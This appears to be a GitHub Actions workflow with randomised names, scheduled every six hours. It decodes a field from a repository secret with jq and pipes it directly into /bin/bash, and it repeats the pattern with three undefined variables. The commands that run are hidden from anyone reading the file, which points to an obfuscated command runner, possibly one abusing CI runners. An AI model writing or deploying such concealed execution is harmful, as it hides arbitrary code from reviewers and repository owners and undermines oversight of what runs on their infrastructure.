name: xiangfeihsbyl

on:
  workflow_dispatch:
  schedule:
    - cron: '6 0/6 * * *'

jobs:  # 11035
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xiangfeihsbyl
        env:
          ylwnn5: ${{ secrets.ylwnn5 }}
        run: |
          echo $ylwnn5 | jq -r .dhyxn399 | /bin/bash
          echo $xq672 | jq -r .fdu588 | /bin/bash
          echo $vzu7501 | jq -r .l9062 | /bin/bash
          echo $h9 | jq -r .xnmwn6285 | /bin/bash

